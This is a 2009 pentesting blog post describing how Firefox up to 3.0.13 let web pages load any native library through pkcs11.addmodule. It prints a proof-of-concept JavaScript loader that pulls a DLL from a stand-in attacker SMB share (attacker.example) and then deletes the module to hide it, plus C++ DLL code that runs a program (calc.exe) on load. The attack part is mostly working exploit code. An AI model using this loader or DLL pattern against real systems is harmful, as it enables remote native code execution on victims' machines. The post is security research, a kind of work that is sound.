0x0e.org | pentesting perspective

braindump on pentesting, QA, metasploit, constant learning

Call an arbitrary library with JavaScript? I think i will.


This is a handy way to get native code running inside the browser process. Kudos to Jesse Ruderman and Dan Kaminsky for the bug discovery and POC.

Essentially, in Firefox up through 3.0.13 (my ubuntu 9.04 is running 3.0.11), there’s a JavaScript function exposed to web content, pkcs11.addmodule, which loads whatever library you point it at as a PKCS#11 crypto module, i.e. straight into the browser process, with the user’s privileges. If you can get a malicious library (see below) somewhere the target can reach, you can use this to get other systems to execute it. Extra win: you can use UNC paths to locate the library, so on Windows it can sit on an SMB share you control rather than on the victim’s disk 🙂

Source is here (note: the page is live, but it points at a non-existent crypto library, so nothing actually gets loaded).
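The JavaScript side of this, as an added example rather than the post’s linked POC: it assumes the pre-fix Firefox window.pkcs11 object with its addmodule(moduleName, libraryFullPath, cryptoMechanismFlags, cipherFlags) and deletemodule(moduleName) methods (the calls MFSA 2009-48 put behind a warning dialog in 3.0.14/3.5.3); the host, share, module and file names are made up.

```javascript
// Added example (not the post's linked POC). Assumes the pre-fix Firefox
// window.pkcs11 object and its addmodule()/deletemodule() methods; the
// host, share and file names below are made up.

// Build a UNC path. Each backslash is doubled once for the JS string
// literal; the resulting string holds single backslashes as Windows expects.
function buildUncPath(host, share, file) {
  return "\\\\" + host + "\\" + share + "\\" + file;
}

// Ask the browser to load `libraryPath` as a PKCS#11 module. Returns an
// object describing what happened instead of throwing, so the same function
// doubles as a check for whether the API is still exposed to web content.
function loadPkcs11Module(pkcs11, moduleName, libraryPath) {
  if (!pkcs11 || typeof pkcs11.addmodule !== "function") {
    return { attempted: false, reason: "pkcs11.addmodule is not exposed to this page" };
  }
  // Both flag arguments are 0: no mechanism or cipher flags are needed just
  // to get the library mapped into the process.
  var rc = pkcs11.addmodule(moduleName, libraryPath, 0, 0);
  return { attempted: true, rc: rc, moduleName: moduleName, libraryPath: libraryPath };
}

// Remove the module again so the entry does not linger in the
// browser's security-device list after the library has run.
function unloadPkcs11Module(pkcs11, moduleName) {
  if (!pkcs11 || typeof pkcs11.deletemodule !== "function") {
    return { attempted: false };
  }
  return { attempted: true, rc: pkcs11.deletemodule(moduleName) };
}

// In a page this is the real object; outside a browser it is undefined and
// loadPkcs11Module reports that instead of throwing.
var browserPkcs11 = (typeof window !== "undefined") ? window.pkcs11 : undefined;
var result = loadPkcs11Module(browserPkcs11, "pkunkcs",
                              buildUncPath("attacker.example", "share", "pkunkcs.dll"));
```

Dropped into a page, a non-zero or missing `attempted` tells you straight away whether the browser in front of you still hands this call to content; on a patched Firefox or any other browser the function returns `attempted: false` rather than loading anything.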

The malicious library just needs some code that runs when it is loaded. In this POC that is the constructor CpkunkcsApp::CpkunkcsApp(), which does nothing but call ShellExecute to launch calc.exe:

#include <windows.h>
#include <shellapi.h>
#include <cstring>

// The POC does not show the class declaration; a minimal one and a global
// instance are assumed here so that the constructor runs when the DLL loads.
class CpkunkcsApp { public: CpkunkcsApp(); };

CpkunkcsApp::CpkunkcsApp()
{
    const char *str = "c:\\windows\\system32\\calc.exe";
    size_t len = strlen(str) + 1;              // include the NUL terminator
    wchar_t *wText = new wchar_t[len];         // original used strlen(str): one wchar_t short of the memset/convert below
    memset(wText, 0, len * sizeof(wchar_t));
    ::MultiByteToWideChar(CP_ACP, 0, str, -1, wText, (int)len);
    ShellExecuteW(NULL, NULL, wText, NULL, NULL, SW_SHOW);   // launch calc.exe as the browser's user
    delete[] wText;
}

CpkunkcsApp theApp;   // assumed global instance (see above)


Written by jcran

September 13, 2009 at 9:17 PM

Posted in Uncategorized
